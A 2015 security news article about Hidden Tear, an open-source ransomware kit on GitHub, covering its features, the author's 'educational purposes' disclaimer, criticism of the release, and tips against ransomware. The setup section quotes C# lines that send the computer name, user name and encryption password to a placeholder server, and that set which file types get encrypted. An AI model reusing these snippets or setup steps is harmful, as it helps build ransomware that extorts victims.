Contact/Tip Us Reach out to get featured—contact us to send your exclusive story idea, research, hacks, or ask us a question or leave a comment/feedback! Follow Us On Social Media RSS Feeds Email Alerts Script Kiddies can Now Create their Own Ransomware using This Kit Khyati JainAug 19, 2015 Don't panic! You heard it right. A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub. The Ransomware dubbed Hidden Tear, uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up. The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware. Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.
The Hidden Tear — Free Ransomware Kit
The "Hidden Tear" Ransomware package consists of four files namely:
Hidden-Tear-Decrypter
Hidden-Tear
.gitignore
README.md
Hidden Tear Ransomware is capable of:
Using AES algorithm to encrypt files
Sending encryption key to a server
Encrypting files and decrypting them using a decrypter program with the encryption key
Creating a text file in Desktop with given message
Small file size (12 KB)
Evading detection by all standard anti-virus programs
How to Setup your Custom Ransomware Using Hidden Tear?
Sen has specified usage details as well, he says: 1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping): string targetURL = "https://www.example.com/hidden-tear/write.php?info="; 2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function: string info = computerName + "-" + userName + " " + password;var fullUrl = targetURL + info;var conent = new System.Net.WebClient().DownloadString(fullUrl); 3. Target file extensions can also be change. Default list: var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
For Educational Purpose... REALLY!
Wait! Sen has something more to say, listening to which you might think...REALLY!! With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him… Why instigating people to commit a crime? One could imagine such "Educational Purposes" as there's a big chance of Ransomware to pop up in recent attacks. A visit to the Video Demonstration of the sandbox testing of 'Hidden Tear' will give a real picture of what all it is capable of doing.
How to Protect Yourself from Ransomware Threat?
Two months ago, we introduced you a Free Ransomware Decryption and Malware Removal ToolKit that could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying off to the cyber crooks. However, there are some important steps that should be considered to protect yourself from Ransomware threats.
Always keep regular backups of your important data.
Make sure you run an active anti-virus security suite of tools on your system.
Do not open email attachments from unknown sources.
Most importantly, always browse the Internet safely.
To keep yourself safe, we also have an excellent article on How to protect your computer from ransomware malware? Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARETweetShareShareShareShare on Facebook Share on Twitter Share on Linkedin Share on Reddit Share on Hacker News Share on Email Share on WhatsApp Share on Facebook Messenger Share on Telegram SHARE decrypt ransomware, Hidden Tear Ransomware, ransomware, Ransomware Kit, ransomware removal tool Trending News Researchers Show Copilot and Grok Can Be Abused as Malware C2 Proxies ⚡ Weekly Recap: Double-Tap Skimmers, PromptSpy AI, 30Tbps DDoS, Docker Malware and More ThreatsDay Bulletin: Kali Linux + Claude, Chrome Crash Traps, WinRAR Flaws, LockBit and 15+ Stories Cisco SD-WAN Zero-Day CVE-2026-20127 Exploited Since 2023 for Admin Access Claude Code Flaws Allow Remote Code Execution and API Key Exfiltration Anthropic Says Chinese AI Firms Used 16 Million Claude Queries to Copy Model Anthropic Launches Claude Code Security for AI-Powered Vulnerability Scanning AI-Assisted Threat Actor Compromises 600+ FortiGate Devices in 55 Countries ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems PromptSpy Android Malware Abuses Gemini AI to Automate Recent-Apps Persistence Notepad++ Fixes Hijacked Update Mechanism Used to Deliver Targeted Malware Dell RecoverPoint for VMs Zero-Day CVE-2026-22769 Exploited Since Mid-2024 Citizen Lab Finds Cellebrite Tool Used on Kenyan Activist’s Phone in Police Custody Identity Prioritization isn't a Backlog Problem - It's a Risk Math Problem How Exposed Endpoints Increase Risk Across LLM Infrastructure Popular Resources 100+ Domains Multiply Attack Risk 6× - Download the CTEM Divide Research Boost SOC Efficiency with AI-Guided Triage — Download Investigator Overview Silent Residency Is the New Threat Model — Download the Red Report Exposed Cloud Training Apps Are Letting Hackers In — Download the Research
Cybersecurity Webinars
Hidden Attack Paths You’re Missing
Learn to Find Hidden Vulnerabilities in Autonomous AI Agents
A practical deep dive into securing AI agents against real-world attack paths beyond the model itself.
Register Inside the Quantum Threat
Learn Quantum-Safe Practices to Stop Future Decrypt Attacks
Quantum computers could soon break today’s encryption—join Zscaler’s webinar to learn how post-quantum cryptography keeps your data safe for the future.
Register Latest News Cybersecurity Resources Zero Trust + AI: Thrive in the AI Era and Remain ResilientZero Trust Everywhere - protection across your workforce, branches, and clouds, and GenAI.. Stop AI-Powered Threats and Protect Sensitive Data with Zscaler Zero Trust + AICompanies must replace legacy firewalls, VPNs, and exposed IPs with a Zero Trust + AI security model to protect AI usage and stop AI-driven attacks. Earn a Master's in Cybersecurity Risk ManagementLead the future of cybersecurity risk management with an online Master’s from Georgetown. Expert Insights Articles Videos
AI SOC Investigation Has Moved Beyond Triage: Two Cases That Show Where It Actually Matters
March 2, 2026Read ➝
AI in Cybersecurity: Is It Worth the Effort for Lean Security Teams?
March 2, 2026Read ➝
Demystifying Key Exchange: From Classical Elliptic Curve Cryptography to a Post-Quantum Future
March 2, 2026Read ➝
AI Won't Break Microsoft 365. Your Security Backlog Will
February 23, 2026Read ➝ Get Latest News in Your Inbox
Get the latest news, expert insights, exclusive resources, and strategies from industry leaders – all for free.